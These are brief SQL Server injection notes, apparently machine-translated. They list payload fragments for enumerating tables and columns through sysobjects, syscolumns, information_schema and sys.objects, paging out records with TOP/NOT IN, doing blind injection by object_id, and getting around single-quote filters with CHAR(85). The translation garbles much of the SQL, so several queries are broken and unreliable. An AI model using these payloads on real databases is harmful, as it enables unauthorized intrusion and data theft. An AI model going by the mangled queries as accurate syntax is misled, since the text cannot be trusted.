Check the library
select Convert For (int, db_name ())
sysobjects
Check the current table id
, the id selected in sysobjects, xtype = 'u' // here to the database record id
syscolumns
look-up table corresponding to the column
select * from syscolumns where id = xxxx // found above id
Before selecting a name from syscolumns id = 2105058535 and the name NOT IN (before selecting a name from the syscolumns id = 2105058535) // TOP used to restrict data and NOT IN
TOP 1 selected user name from test1, where username NOT IN (select a user name from the TOP 1 test1)
TOP 1 selected user name from test1, wherein ID NOT IN (select a user name from test1 TOP 0)
information_schema
lookup selected from table_name information_schema.tables, where table_schema = 'dbo'
Check column select column_name from information_schema.columns, where table_name = 'test1'
About sys.objects co sys.columns
two tables also can be used to inject version it seems to be the presence of more than 2005 version sqlserver before the project had encountered one injection point but sysobjects and information_schema to filter just the two tables can be used to achieve injection effect
To get the column names by object_id
Injection mostly blind as blind this case, the actual injection rarely combined query may be determined by a correspondence table (object_id selecting from sys.objects, where name = 'XXX')> xxxx object id
2: No single quotes injection
encounter previous studies have not taken into account this recent single quotes the following items
First check sysobjectsburstid
selected from the id (to select xtype = CHAR (85) from the sysobjects id) as b where id> 2000000000
Common situation
From aab ID = 1 and * (selected from xtype = CHAR (85) is in sysobjects id)> 10000000000
Probably so that other similar